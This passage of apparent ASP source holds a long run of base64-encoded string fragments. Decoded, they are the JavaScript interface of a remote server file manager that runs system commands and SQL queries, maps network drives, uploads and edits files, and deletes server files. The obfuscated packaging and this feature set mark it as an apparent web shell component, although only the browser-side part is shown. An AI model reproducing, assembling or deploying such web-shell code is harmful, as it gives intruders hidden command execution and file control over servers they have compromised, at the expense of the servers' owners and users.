+"CWhpZGVMb2FkaW5nKCk7CgkJfQogIAl9Y2F0Y2goZSl7CgkJY2xlYXJUaW1lb3V0ICggc2F2ZVRpbWVyICk7CgkJYWxlcnQoIkphdmFzY3JpcHQgUHJvYmxlbSAhISEiKTsKCQlzaG93TW9kZSgiRXhwbG9yZXIiLCBmYWxzZSk7CgkJY3VycmVudF9ydW5uaW5nID0gZmFsc2U7CgkJaGlkZUxvYWRpbmcoKTsKCX0KCWZpbmFsbHl7" &_
+"fQp9CgpmdW5jdGlvbiBoYW5kbGVBY3Rpb25SZXNwb25zZSgpIHsKCXRyeSB7CgkJaWYoaHR0cC5yZWFkeVN0YXRlID09IDQpewoJCQl2YXIgc2hvd0NvbnRlbnQgPSAiRXhwbG9yZXIiOwoJCQl2YXIgY2hhbmdlVXJsID0gZmFsc2U7CgkJCXZhciByZXNwb25zZSA9ICcnOwoJCQlpZiAoaHR0cC5zdGF0dXMgPT0gMjAwKXsKCQkJ" &_
+"CXJlc3BvbnNlID0gaHR0cC5yZXNwb25zZVRleHQ7CgkJCQlpZiAocmVzcG9uc2Uuc3RhcnRzV2l0aCgiYWN0aW9uUmVzcG9uc2UiKSAmJiBldmFsKCIiICsgcmVzcG9uc2UgKyAiIikpIHsKCQkJCQlpZihhY3Rpb25SZXNwb25zZS5hY3Rpb24uZXJyb3IgIT0gMCkKCQkJCQl7CgkJCQkJCWFsZXJ0KGFjdGlvblJlc3BvbnNlLmFj" &_
+"dGlvbi5lcnJvckRlc2MpOwoJCQkJCQlnZXRJZCgnZXJyQ29kZScpLmlubmVySFRNTCA9IGFjdGlvblJlc3BvbnNlLmFjdGlvbi5lcnJvcjsKCQkJCQkJZ2V0SWQoJ2VyckRlc2MnKS5pbm5lckhUTUwgPSBhY3Rpb25SZXNwb25zZS5hY3Rpb24uZXJyb3JEZXNjLnJlcGxhY2UoIlxyXG5cclxuIiwgIjxQPiIpLnJlcGxhY2UoIlxy" &_
+"XG4iLCAiPEJSPiIpICsgJyZuYnNwOyc7CgoJCQkJCQlzaG93ZGl2KCJ0YmxFcnIiLCB0cnVlLCB0cnVlKTsKCgkJCQkJCXN3aXRjaCAoYWN0aW9uUmVzcG9uc2UuYWN0aW9uLmFjdGlvbil7CgkJCQkJCWNhc2UgInJ1blNRTCIgOgoJCQkJCQkJZGlzcGxheVNRTENvbnRlbnQoYWN0aW9uUmVzcG9uc2UpOwoJCQkJCQkJc2hvd0Nv" &_
+"bnRlbnQgPSAiU1FMIjsKCQkJCQkJCWJyZWFrOwoJCQkJCQljYXNlICJydW5DTUQiIDoKCQkJCQkJCXNob3dDb250ZW50ID0gIkNNRCI7CgkJCQkJCQlicmVhazsKCQkJCQkJZGVmYXVsdDoKCQkJCQkJCWNoYW5nZVVybCA9IHRydWU7CgkJCQkJCX0KCQkJCQl9ZWxzZXsKCQkJCQkJc3dpdGNoIChhY3Rpb25SZXNwb25zZS5hY3Rp" &_
+"b24uYWN0aW9uKXsKCQkJCQkJY2FzZSAicmVuYW1lRmlsZSIgOgoJCQkJCQkJZmZMaXN0LmZpbGVzW2FjdGlvblJlc3BvbnNlLmFjdGlvbi5maWxlSWRdID0gZmZMaXN0LmZpbGVzW2FjdGlvblJlc3BvbnNlLmFjdGlvbi5maWxlSWRdLnJlcGxhY2UoYWN0aW9uUmVzcG9uc2UuYWN0aW9uLmZpbGVOYW1lLCBhY3Rpb25SZXNwb25z" &_
+"ZS5hY3Rpb24ubmV3TmFtZSk7CgkJCQkJCQlnZXRJZCgnZmlsZScrYWN0aW9uUmVzcG9uc2UuYWN0aW9uLmZpbGVJZCkuY2hpbGROb2Rlc1swXS5pbm5lckhUTUwgPSBhZGRGaWxlUm93KGFjdGlvblJlc3BvbnNlLmFjdGlvbi5maWxlSWQpLmNoaWxkTm9kZXNbMF0uaW5uZXJIVE1MOwoJCQkJCQkJZ2V0SWQoJ2ZpbGUnK2FjdGlv" &_
+"blJlc3BvbnNlLmFjdGlvbi5maWxlSWQpLmNoaWxkTm9kZXNbNl0uaW5uZXJIVE1MID0gYWRkRmlsZVJvdyhhY3Rpb25SZXNwb25zZS5hY3Rpb24uZmlsZUlkKS5jaGlsZE5vZGVzWzZdLmlubmVySFRNTDsKCQkJCQkJCWJyZWFrOwoJCQkJCQljYXNlICJyZW5hbWVGb2xkZXIiIDoKCQkJCQkJCWZmTGlzdC5mb2xkZXJzW2FjdGlv" &_
+"blJlc3BvbnNlLmFjdGlvbi5mb2xkZXJJZF0gPSBmZkxpc3QuZm9sZGVyc1thY3Rpb25SZXNwb25zZS5hY3Rpb24uZm9sZGVySWRdLnJlcGxhY2UoYWN0aW9uUmVzcG9uc2UuYWN0aW9uLmZvbGRlck5hbWUsIGFjdGlvblJlc3BvbnNlLmFjdGlvbi5uZXdOYW1lKTsKCQkJCQkJCWdldElkKCdmb2xkZXInK2FjdGlvblJlc3BvbnNl" &_
+"LmFjdGlvbi5mb2xkZXJJZCkuZmlyc3RDaGlsZC5pbm5lckhUTUwgPSAiJm5ic3A7Jm5ic3A7PGltZyBzcmM9Jz9tb2RlPWltYWdlJmltZ0lkPWRpcic+PEEgaHJlZj0nI0V4cGxvcmVyfCIgKyBmZkxpc3QuaW5mby5wYXRoICsgYWN0aW9uUmVzcG9uc2UuYWN0aW9uLm5ld05hbWUuYWRkU2xhc2goKSsiJz4iICsgYWN0aW9uUmVz" &_
+"cG9uc2UuYWN0aW9uLm5ld05hbWUgKyAiPC9BPiI7CgkJCQkJCQlicmVhazsKCQkJCQkJY2FzZSAicmVtb3ZlRHJpdmVyIiA6CgkJCQkJCQlnZXRJZCgidGJsRHJpdmVycyIpLmZpcnN0Q2hpbGQucmVtb3ZlQ2hpbGQoZ2V0SWQoImRyaXZlciIgKyBhY3Rpb25SZXNwb25zZS5hY3Rpb24uZHJpdmVyTGV0dGVyKSk7CgkJCQkJCQli" &_
+"cmVhazsKCQkJCQkJY2FzZSAibWFwRHJpdmVyIiA6CgkJCQkJCQluZXdSb3cgPSBhZGRUUihhY3Rpb25SZXNwb25zZS5hY3Rpb24uZHJpdmVyTGV0dGVyLCAiZHJpdmVyIik7CgkJCQkJCQluZXdDb2wgPSBhZGRURCgiPGEgaHJlZj0nI0V4cGxvcmVyfCIgKyBhY3Rpb25SZXNwb25zZS5hY3Rpb24uZHJpdmVyTGV0dGVyICsgIjpc" &_
+"XCcgdGl0bGU9JyIgKyBhY3Rpb25SZXNwb25zZS5hY3Rpb24ucmVtb3RlU2hhcmUgKyAiJz4mbmJzcDsmbmJzcDtOZXR3b3JrIERyaXZlIFsiICsgYWN0aW9uUmVzcG9uc2UuYWN0aW9uLmRyaXZlckxldHRlciArICI6XTwvYT4mbmJzcDsmbmJzcDs8YSBocmVmPVwiamF2YXNjcmlwdDpyZW1vdmVEcml2ZXIoJyIgKyBhY3Rpb25S" &_
+"ZXNwb25zZS5hY3Rpb24uZHJpdmVyTGV0dGVyICsgIicpO1wiPltSZW1vdmVdPC9hPiIsICJrYnJ0bSIpOwoJCQkJCQkJbmV3Um93LmFwcGVuZENoaWxkKG5ld0NvbCk7CgkJCQkJCQlnZXRJZCgidGJsRHJpdmVycyIpLmZpcnN0Q2hpbGQuaW5zZXJ0QmVmb3JlKG5ld1JvdywgZ2V0SWQoImFkZE1hcE5ldHdvcmsiKSk7CgkJCQkJ" &_
+"CQlicmVhazsKCQkJCQkJY2FzZSAicnVuQ01EIiA6CgkJCQkJCQlzaG93Q29udGVudCA9ICJDTUQiOwoJCQkJCQkJZ2V0SWQoInR4dENtZFJlc3VsdCIpLnZhbHVlID0gYWN0aW9uUmVzcG9uc2UuYWN0aW9uLnJldHVybkNvbnRlbnQ7CgkJCQkJCQlicmVhazsKCQkJCQkJY2FzZSAicnVuU1FMIiA6CgkJCQkJCQlkaXNwbGF5U1FM" &_
+"Q29udGVudChhY3Rpb25SZXNwb25zZSk7CgkJCQkJCQlzaG93Q29udGVudCA9ICJTUUwiOwoJCQkJCQkJYnJlYWs7CgkJCQkJCWNhc2UgImxvYWRGaWxlIiA6CgkJCQkJCQlpZihhY3Rpb25SZXNwb25zZS5hY3Rpb24uaXRlbVNpemUgPiA1MTIwMDApewoJCQkJCQkJCWFsZXJ0KCJGaWxlIHNpemUgaXMgdG9vIGxhcmdlICgiICsg" &_
+"YWN0aW9uUmVzcG9uc2UuYWN0aW9uLml0ZW1TaXplVGV4dCArICIpLCBtYXhpbXVtIGlzIDUwMEtCLiBJdCBtYXkgY2F1c2UgeW91ciBicm93c2VyIGZyZWV6ZSAhIik7CgkJCQkJCQkJY2hhbmdlVXJsID0gdHJ1ZTsKCQkJCQkJCX1lbHNlewoJCQkJCQkJCXNob3dDb250ZW50ID0gIkVkaXQiOwoJCQkJCQkJCWdldElkKCJ0eHRD" &_
+"b250ZW50IikudmFsdWUgPSBhY3Rpb25SZXNwb25zZS5hY3Rpb24uaXRlbUNvbnRlbnQ7CgkJCQkJCQkJZ2V0SWQoImxibEZpbGUiKS5pbm5lckhUTUwgPSBnZXRWYXIod2luZG93LmxvY2F0aW9uLmhyZWYsMSk7CgkJCQkJCQl9CgkJCQkJCQlicmVhazsKCQkJCQkJY2FzZSAic2F2ZUZpbGUiIDoKCQkJCQkJCXNob3dDb250ZW50" &_
+"ID0gIkVkaXQiOwoJCQkJCQkJdmFyIGVkaXRQYXRoID0gZ2V0VmFyKHdpbmRvdy5sb2NhdGlvbi5ocmVmLDEpLnNwbGl0KCJcXCIpOwoJCQkJCQkJZ2V0SWQoImxibEZpbGUiKS5pbm5lckhUTUwgPSBnZXRWYXIod2luZG93LmxvY2F0aW9uLmhyZWYsMSk7CgkJCQkJCQlpZighc2F2ZVRpbWVyKQoJCQkJCQkJCWFsZXJ0KCJGaWxl" &_
+"ICIgKyBlZGl0UGF0aFtlZGl0UGF0aC5sZW5ndGgtMV0gKyAiIHNhdmVkICEiKTsKCQkJCQkJCWJyZWFrOwoJCQkJCQljYXNlICJuZXdGaWxlIiA6CgkJCQkJCQlub0ZpbGUgKz0gMTsKCQkJCQkJCXNldEl0ZW1zQ291bnQoKTsKCQkJCQkJCWZmTGlzdC5maWxlcy5wdXNoKGFjdGlvblJlc3BvbnNlLmFjdGlvbi5uZXdJdGVtKTsK" &_
+"CQkJCQkJCWdldElkKCJ0YmxMaXN0IikuaW5zZXJ0QmVmb3JlKGFkZEZpbGVSb3coZmZMaXN0LmZpbGVzLmxpc3RGaW5kKGFjdGlvblJlc3BvbnNlLmFjdGlvbi5uZXdJdGVtLnNwbGl0KCJ8IilbMF0pKSwgZ2V0SWQoInRibExpc3QiKS5sYXN0Q2hpbGQubmV4dFNpYmxpbmcpOwoJCQkJCQkJYnJlYWs7CgkJCQkJCWNhc2UgIm5l" &_
+"d0ZvbGRlciIgOgoJCQkJCQkJbm9Gb2xkZXIgKz0gMTsKCQkJCQkJCXNldEl0ZW1zQ291bnQoKTsKCQkJCQkJCWZmTGlzdC5mb2xkZXJzLnB1c2goYWN0aW9uUmVzcG9uc2UuYWN0aW9uLm5ld0l0ZW0pOwoJCQkJCQkJZ2V0SWQoInRibExpc3QiKS5pbnNlcnRCZWZvcmUoYWRkRm9sZGVyUm93KGZmTGlzdC5mb2xkZXJzLmxpc3RG" &_
+"aW5kKGFjdGlvblJlc3BvbnNlLmFjdGlvbi5uZXdJdGVtLnNwbGl0KCJ8IilbMF0pKSwgZ2V0SWQoImdhcDAiKSk7CgkJCQkJCQlicmVhazsKCQkJCQkJY2FzZSAibW92ZSIgOgoJCQkJCQljYXNlICJkZWxldGUiIDoKCQkJCQkJCXJzcEZvbGRlcnMgPSBhY3Rpb25SZXNwb25zZS5hY3Rpb24uZm9sZGVyc0lkLnNwbGl0KCJ8Iik7" &_
+"CgkJCQkJCQlyc3BGaWxlcyA9IGFjdGlvblJlc3BvbnNlLmFjdGlvbi5maWxlc0lkLnNwbGl0KCJ8Iik7CgoJCQkJCQkJaWYocnNwRm9sZGVycy5sZW5ndGggPiAxKQoJCQkJCQkJewoJCQkJCQkJCWZvcihpPTA7aTxyc3BGb2xkZXJzLmxlbmd0aC0xO2krKykKCQkJCQkJCQl7CgkJCQkJCQkJCW5vRm9sZGVyIC09IDE7CgkJCQkJ" &_
+"CQkJCXNldEl0ZW1zQ291bnQoKTsKCQkJCQkJCQkJZ2V0SWQoInRibExpc3QiKS5yZW1vdmVDaGlsZChnZXRJZCgiZm9sZGVyIiArIGZmTGlzdC5mb2xkZXJzLmxpc3RGaW5kKHJzcEZvbGRlcnNbaV0pKSk7CgkJCQkJCQkJfQoJCQkJCQkJfQoKCQkJCQkJCWlmKHJzcEZpbGVzLmxlbmd0aCA+IDEpCgkJCQkJCQl7CgkJCQkJCQkJ" &_
+"Zm9yKGk9MDtpPHJzcEZpbGVzLmxlbmd0aC0xO2krKykKCQkJCQkJCQl7CgkJCQkJCQkJCW5vRmlsZSAtPSAxOwoJCQkJCQkJCQlzZXRJdGVtc0NvdW50KCk7CgkJCQkJCQkJCWdldElkKCJ0YmxMaXN0IikucmVtb3ZlQ2hpbGQoZ2V0SWQoImZpbGUiICsgZmZMaXN0LmZpbGVzLmxpc3RGaW5kKHJzcEZpbGVzW2ldKSkpOwoJCQkJ" &_
+"CQkJCX0KCQkJCQkJCX0KCQkJCQkJCWJyZWFrOwoJCQkJCQl9CgkJCQkJCXNob3dkaXYoInRibEVyciIsIGZhbHNlKTsKCQkJCQkJaWYoYWN0aW9uUmVzcG9uc2UuYWN0aW9uLm1zZ1Jlc3BvbnNlKQoJCQkJCQkJYWxlcnQoYWN0aW9uUmVzcG9uc2UuYWN0aW9uLm1zZ1Jlc3BvbnNlKTsKCQkJCQl9CgkJCQl9ZWxzZXsKCQkJCQkJ" &_
+"aWYocmVzcG9uc2UgPT0gJycpewoJCQkJCQkJYWxlcnQoIlNlc3Npb24gVGltZW91dC4gUGxlYXNlIGxvZ2luIGFnYWluICEiKTsKCQkJCQkJfWVsc2V7CgkJCQkJCQlhbGVydCgiQmFkIHJlc3BvbnNlICEhISIpOwoJCQkJCQl9CgkJCQkJCWNoYW5nZVVybCA9IHRydWU7CgkJCQl9CgkJCX1lbHNlewoJCQkJCWNsZWFyVGltZW91" &_
+"dCAoIHNhdmVUaW1lciApOwoJCQkJCWFsZXJ0KCJCYWQgcmVzcG9uc2UgSFRUUCBTdGF0dXMgKCIrIGh0dHAuc3RhdHVzICsiKSAhISEiKTsKCQkJCQljaGFuZ2VVcmwgPSB0cnVlOwoJCQkJfQoJCQlpZighc2F2ZVRpbWVyKXsKCQkJCXNob3dNb2RlKHNob3dDb250ZW50LCBjaGFuZ2VVcmwpOwoJCQkJaGlkZUxvYWRpbmcoKTsK" &_
+"CQkJfQoJCQljdXJyZW50X3J1bm5pbmcgPSBmYWxzZTsKCQl9Cgl9Y2F0Y2goZSl7CgkJY2xlYXJUaW1lb3V0ICggc2F2ZVRpbWVyICk7CgkJYWxlcnQoIkphdmFzY3JpcHQgUHJvYmxlbSAhISEiKTsKCQlzaG93TW9kZSgiRXhwbG9yZXIiLCBmYWxzZSk7CgkJY3VycmVudF9ydW5uaW5nID0gZmFsc2U7CgkJaGlkZUxvYWRpbmco" &_
+"KTsKCX0KCWZpbmFsbHl7fQp9CgpmdW5jdGlvbiBzZXRJdGVtc0NvdW50KCkKewoJZ2V0SWQoImZvbGRlck5vIikuaW5uZXJIVE1MID0gZmZMaXN0LmZvbGRlcnMubGVuZ3RoICsgbm9Gb2xkZXI7CglnZXRJZCgiZmlsZU5vIikuaW5uZXJIVE1MID0gZmZMaXN0LmZpbGVzLmxlbmd0aCArIG5vRmlsZTsKCglnZXRJZCgidG90YWxG" &_
+"b2xkZXJzIikuaW5uZXJIVE1MID0gZmZMaXN0LnN0YXR1cy50b3RhbEZvbGRlcnMgKyBub0ZvbGRlcjsKCWdldElkKCJ0b3RhbEZpbGVzIikuaW5uZXJIVE1MID0gZmZMaXN0LnN0YXR1cy50b3RhbEZpbGVzICsgbm9GaWxlOwp9CgpmdW5jdGlvbiBnZXRWYXIodXJsLGNudCkKewoJdXJsPXVybCsnIyc7Cgl1cmw9dXJsLnNwbGl0" &_
+"KCcjJyk7CglpZiAoIXVybFsxXSkgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnI0V4cGxvcmVyfFxcJzsKCXVybD11cmxbMV07Cgl1cmw9dXJsKyd8JzsKCXVybD11cmwuc3BsaXQoJ3wnKTsKCWlmIChjbnQgIT0gLTEpIHsKCQl1cmw9dXJsW2NudF07CgkJaWYgKCF1cmwpIHJldHVybiAnJzsKCX0KCXJldHVybiB1bmVzY2FwZSh1" &_
+"cmwpOwp9CgpmdW5jdGlvbiBsb2FkUGFnZSgpIHsKCWFjdCA9IGdldFZhcih3aW5kb3cubG9jYXRpb24uaHJlZiwwKTsKCglpZihnZXRWYXIobGFzdFVybCwwKSA9PSAnRXhwbG9yZXInKXsKCQlwb3NFeHAgPSBjdXJfcG9zKCk7Cgl9ZWxzZSBpZihnZXRWYXIobGFzdFVybCwwKSA9PSAnU1FMJyl7CgkJcG9zU1FMID0gY3VyX3Bv" &_
+"cygpOwoJfQoKCWlmIChhY3QgPT0gJ0V4cGxvcmVyJykgewoJCXBvc0V4cCA9IDA7CgkJY3VycmVudF9sb2NhdGlvbj1nZXRWYXIod2luZG93LmxvY2F0aW9uLmhyZWYsMSkuYWRkU2xhc2goKTsKCQlpZiAoY3VycmVudF9sb2NhdGlvbikgc2VuZFJlcXVlc3QoY3VycmVudF9sb2NhdGlvbik7CgkJZWxzZSBzZW5kUmVxdWVzdCgn" &_
+"XFwnKTsKCX0gZWxzZSBpZiAoYWN0ID09ICdFZGl0JykgewoJCWxvYWRGaWxlKCk7Cgl9IGVsc2UgaWYgKGFjdCA9PSAnVmlldycpIHsKCQlpbWdfdmlldyA9IG5ldyBJbWFnZSgpOwoJCWltZ192aWV3LnNyYyA9ICI/bW9kZT12aWV3JmltYWdlUGF0aD0iICsgZ2V0VmFyKHdpbmRvdy5sb2NhdGlvbi5ocmVmLDEpOwoJCWltZ192" &_
+"aWV3Lm9uZXJyb3IgPSBmdW5jdGlvbigpe2FsZXJ0KCJDYW4gbm90IGxvYWQgdGhlIGltYWdlICEiKTtpbWdfdmlldyA9IG51bGw7fTsKCQlpbWdfdmlldy5vbmxvYWQgPSBmdW5jdGlvbigpe2lmKGltZ192aWV3LndpZHRoPjgwMCl7Z2V0SWQoImltZ1BpY3R1cmUiKS53aWR0aCA9ICI4MDAiO2dldElkKCJpbWdQaWN0dXJlIiku" &_
+"aGVpZ2h0ID0gKGltZ192aWV3LmhlaWdodCAqIDgwMCAvIGltZ192aWV3LndpZHRoKTt9ZWxzZXtnZXRJZCgiaW1nUGljdHVyZSIpLndpZHRoID0gaW1nX3ZpZXcud2lkdGg7Z2V0SWQoImltZ1BpY3R1cmUiKS5oZWlnaHQgPSBpbWdfdmlldy5oZWlnaHQ7fWdldElkKCJpbWdQaWN0dXJlIikuc3JjID0gaW1nX3ZpZXcuc3JjO2lt" &_
+"Z192aWV3ID0gbnVsbDt9OwoJCXNob3dNb2RlKGFjdCk7Cgl9ICBlbHNlIGlmIChhY3QgPT0gJ1NRTCcpIHsKCQlzaG93TW9kZShhY3QpOwoJfSAgZWxzZSBpZiAoYWN0ID09ICdDTUQnKSB7CgkJc2hvd01vZGUoYWN0KTsKCX0gIGVsc2UgaWYgKGFjdCA9PSAnVXBsb2FkJykgewoJCWdldElkKCJ1cGxvYWRMb2NhdGlvbiIpLmlu" &_
+"bmVySFRNTCA9IGdldFZhcih3aW5kb3cubG9jYXRpb24uaHJlZiwxKS5hZGRTbGFzaCgpOwoJCWdldElkKCJ0eHR1cGxvYWRMb2NhdGlvbiIpLnZhbHVlID0gZ2V0VmFyKHdpbmRvdy5sb2NhdGlvbi5ocmVmLDEpLmFkZFNsYXNoKCk7CgkJZ2V0SWQoImxpbmtCYWNrIikudmFsdWUgPSBsYXN0VXJsQmFja3VwOwoJCXNob3dNb2Rl" &_
+"KGFjdCk7Cgl9Cn0KCmZ1bmN0aW9uIGxvYWRNb3JlKCkgewoJaWYoIWZmTGlzdC5zdGF0dXMuZmluaXNoZWQpCgkJc2VuZFJlcXVlc3QoZmZMaXN0LmluZm8ucGF0aC5hZGRTbGFzaCgpLCBmZkxpc3Quc3RhdHVzLml0ZW1TdGFydCArIDIwMCk7Cn0KCmZ1bmN0aW9uIGN1cl9wb3MoKSB7Cgl2YXIgdG9wID0gZG9jdW1lbnQuYm9k" &_
+"eS5zY3JvbGxUb3AKICAgID8gZG9jdW1lbnQuYm9keS5zY3JvbGxUb3AKICAgIDogKHdpbmRvdy5wYWdlWU9mZnNldAogICAgICAgID8gd2luZG93LnBhZ2VZT2Zmc2V0CiAgICAgICAgOiAoZG9jdW1lbnQuYm9keS5wYXJlbnRFbGVtZW50CiAgICAgICAgICAgID8gZG9jdW1lbnQuYm9keS5wYXJlbnRFbGVtZW50LnNjcm9sbFRv" &_
+"cAogICAgICAgICAgICA6IDAKICAgICAgICApCiAgICApOwoKCXJldHVybiB0b3A7Cn0KCmZ1bmN0aW9uIHNob3dkaXYoaWQsIHNob3csIHRhYmxlKSB7CglnZXRJZChpZCkuc3R5bGUuZGlzcGxheSA9IChzaG93KSA/ICh0YWJsZSA/ICd0YWJsZScgOiAnYmxvY2snKSA6ICdub25lJzsKfQoKZnVuY3Rpb24gc2hvd01vZGUobW9k" &_
+"ZSwgY2hhbmdlVXJsKSB7CgljdXJyX21vZGU9Z2V0VmFyKHdpbmRvdy5sb2NhdGlvbi5ocmVmLDApOwoJbGFzdF9tb2RlPWdldFZhcihsYXN0VXJsLDApOwoKCWlmKGxhc3RfbW9kZSA9PSAnRXhwbG9yZXInKXsKCQlwb3NFeHAgPSBjdXJfcG9zKCk7Cgl9ZWxzZSBpZihsYXN0X21vZGUgPT0gJ1NRTCcpewoJCXBvc1NRTCA9IGN1" &_
+"cl9wb3MoKTsKCX0KCQoJaWYoY2hhbmdlVXJsICYmIGN1cnJfbW9kZSAhPSAiRXhwbG9yZXIiKQoJewoJCWxhc3RVcmwgPSBsYXN0VXJsQmFja3VwOwoJCXdpbmRvdy5sb2NhdGlvbi5ocmVmID0gbGFzdFVybEJhY2t1cDsKCQlnZXRJZCgicmVtb3RlIikudmFsdWUgPSBmZkxpc3QuaW5mby5wYXRoLmFkZFNsYXNoKCk7CgkJZ2V0" &_
+"SWQoInJlbW90ZUNvcHkiKS52YWx1ZSA9IGZmTGlzdC5pbmZvLnBhdGguYWRkU2xhc2goKTsKCQlnZXRJZCgicmVtb3RlTW92ZSIpLnZhbHVlID0gZmZMaXN0LmluZm8ucGF0aC5hZGRTbGFzaCgpOwoJfQoKCWlmKG1vZGUgIT0gIlZpZXciKXsKCQlnZXRJZCgiaW1nUGljdHVyZSIpLnNyYyA9IGltZ19sb2FkaW5nLnNyYzsKCQln" &_
+"ZXRJZCgiaW1nUGljdHVyZSIpLndpZHRoID0gaW1nX2xvYWRpbmcud2lkdGg7CgkJZ2V0SWQoImltZ1BpY3R1cmUiKS5oZWlnaHQgPSBpbWdfbG9hZGluZy5oZWlnaHQ7Cgl9CgoJc2hvd2RpdigidGJsQ29udGVudCIsIChtb2RlID09ICJFeHBsb3JlciIpLCB0cnVlKTsKCXNob3dkaXYoImZmTm8iLCAobW9kZSA9PSAiRXhwbG9y" &_
+"ZXIiKSk7CglzaG93ZGl2KCJ0YmxEcml2ZXJzIiwgKG1vZGUgPT0gIkV4cGxvcmVyIiksIHRydWUpOwoKCXNob3dkaXYoInRibEZpbGVFZGl0IiwgKG1vZGUgPT0gIkVkaXQiKSwgdHJ1ZSk7CglzaG93ZGl2KCJ0YmxQaWN0dXJlIiwgKG1vZGUgPT0gIlZpZXciKSwgdHJ1ZSk7CglzaG93ZGl2KCJ0YmxVcGxvYWQiLCAobW9kZSA9" &_
+"PSAiVXBsb2FkIiksIHRydWUpOwoJc2hvd2RpdigidGJsQ21kIiwgKG1vZGUgPT0gIkNNRCIpLCB0cnVlKTsKCXNob3dkaXYoInRibFNxbCIsIChtb2RlID09ICJTUUwiKSwgdHJ1ZSk7CgoJaWYobW9kZSA9PSAiRXhwbG9yZXIiICYmIGN1cnJfbW9kZSAhPSAiRXhwbG9yZXIiKXsKCQl3aW5kb3cuc2Nyb2xsVG8oMCwgcG9zRXhw" &_
+"KTsKCX0KCQoJaWYobW9kZSA9PSAiRXhwbG9yZXIiICYmIGN1cnJfbW9kZSA9PSAiRXhwbG9yZXIiICYmIGNoYW5nZVVybCl7CgkJd2luZG93LnNjcm9sbFRvKDAsIDApOwoJfQoKCWlmKG1vZGUgPT0gIlNRTCIgJiYgbGFzdF9tb2RlICE9ICJTUUwiKXsKCQl3aW5kb3cuc2Nyb2xsVG8oMCwgcG9zU1FMKTsKCX0KCglpZihtb2Rl" &_
+"ID09ICJTUUwiICYmIGxhc3RfbW9kZSA9PSAiU1FMIil7CgkJd2luZG93LnNjcm9sbFRvKDAsIDApOwoJfQp9CgpmdW5jdGlvbiBzaG93TWFwTmV0d29yaygpCnsKCWdldElkKCJvdmVybGF5Iikuc3R5bGUud2lkdGg9Z2V0UGFnZVNpemUoKVswXSsncHgnOwoJZ2V0SWQoIm92ZXJsYXkiKS5zdHlsZS5oZWlnaHQ9Z2V0UGFnZVNp" &_
+"emUoKVsxXSsncHgnOwoKCXNob3dkaXYoIm92ZXJsYXkiLCB0cnVlKTsKCXNob3dkaXYoInRibE1hcERyaXZlciIsIHRydWUpOwp9CgpmdW5jdGlvbiBoaWRlTWFwTmV0d29yaygpCnsKCWdldElkKCJvdmVybGF5Iikuc3R5bGUud2lkdGg9JzBweCc7CglnZXRJZCgib3ZlcmxheSIpLnN0eWxlLmhlaWdodD0nMHB4JzsKCglzaG93" &_
+"ZGl2KCJvdmVybGF5IiwgZmFsc2UpOwoJc2hvd2RpdigidGJsTWFwRHJpdmVyIiwgZmFsc2UpOwp9CgpmdW5jdGlvbiBzaG93TG9hZGluZygpCnsKCWdldElkKCJvdmVybGF5Iikuc3R5bGUud2lkdGg9Z2V0UGFnZVNpemUoKVswXSsncHgnOwoJZ2V0SWQoIm92ZXJsYXkiKS5zdHlsZS5oZWlnaHQ9Z2V0UGFnZVNpemUoKVsxXSsn" &_
+"cHgnOwoKCXNob3dkaXYoIm92ZXJsYXkiLCB0cnVlKTsKCXNob3dkaXYoInRibExvYWRpbmciLCB0cnVlKTsKfQoKZnVuY3Rpb24gaGlkZUxvYWRpbmcoKQp7CglzaG93ZGl2KCJvdmVybGF5IiwgZmFsc2UpOwoJc2hvd2RpdigidGJsTG9hZGluZyIsIGZhbHNlKTsKCWdldElkKCJvdmVybGF5Iikuc3R5bGUud2lkdGg9JzBweCc7" &_
+"CglnZXRJZCgib3ZlcmxheSIpLnN0eWxlLmhlaWdodD0nMHB4JzsKfQoKZnVuY3Rpb24gZ2V0UGFnZVNpemUoKSB7CgoJIHZhciB4U2Nyb2xsLCB5U2Nyb2xsOwoKCWlmICh3aW5kb3cuaW5uZXJIZWlnaHQgJiYgd2luZG93LnNjcm9sbE1heFkpIHsKCQl4U2Nyb2xsID0gd2luZG93LmlubmVyV2lkdGggKyB3aW5kb3cuc2Nyb2xs" &_
+"TWF4WDsKCQl5U2Nyb2xsID0gd2luZG93LmlubmVySGVpZ2h0ICsgd2luZG93LnNjcm9sbE1heFk7Cgl9IGVsc2UgaWYgKGRvY3VtZW50LmJvZHkuc2Nyb2xsSGVpZ2h0ID4gZG9jdW1lbnQuYm9keS5vZmZzZXRIZWlnaHQpeyAvLyBhbGwgYnV0IEV4cGxvcmVyIE1hYwoJCXhTY3JvbGwgPSBkb2N1bWVudC5ib2R5LnNjcm9sbFdp" &_
+"ZHRoOwoJCXlTY3JvbGwgPSBkb2N1bWVudC5ib2R5LnNjcm9sbEhlaWdodDsKCX0gZWxzZSB7IC8vIEV4cGxvcmVyIE1hYy4uLndvdWxkIGFsc28gd29yayBpbiBFeHBsb3JlciA2IFN0cmljdCwgTW96aWxsYSBhbmQgU2FmYXJpCgkJeFNjcm9sbCA9IGRvY3VtZW50LmJvZHkub2Zmc2V0V2lkdGg7CgkJeVNjcm9sbCA9IGRvY3Vt" &_
+"ZW50LmJvZHkub2Zmc2V0SGVpZ2h0OwoJfQoKCXZhciB3aW5kb3dXaWR0aCwgd2luZG93SGVpZ2h0OwoKCWlmIChzZWxmLmlubmVySGVpZ2h0KSB7CS8vIGFsbCBleGNlcHQgRXhwbG9yZXIKCQlpZihkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuY2xpZW50V2lkdGgpewoJCQl3aW5kb3dXaWR0aCA9IGRvY3VtZW50LmRvY3VtZW50" &_
+"RWxlbWVudC5jbGllbnRXaWR0aDsKCQl9IGVsc2UgewoJCQl3aW5kb3dXaWR0aCA9IHNlbGYuaW5uZXJXaWR0aDsKCQl9CgkJd2luZG93SGVpZ2h0ID0gc2VsZi5pbm5lckhlaWdodDsKCX0gZWxzZSBpZiAoZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50ICYmIGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5jbGllbnRIZWlnaHQpIHsg" &_
+"Ly8gRXhwbG9yZXIgNiBTdHJpY3QgTW9kZQoJCXdpbmRvd1dpZHRoID0gZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmNsaWVudFdpZHRoOwoJCXdpbmRvd0hlaWdodCA9IGRvY3VtZW50LmRvY3VtZW50RWxlbWVudC5jbGllbnRIZWlnaHQ7Cgl9IGVsc2UgaWYgKGRvY3VtZW50LmJvZHkpIHsgLy8gb3RoZXIgRXhwbG9yZXJzCgkJ" &_
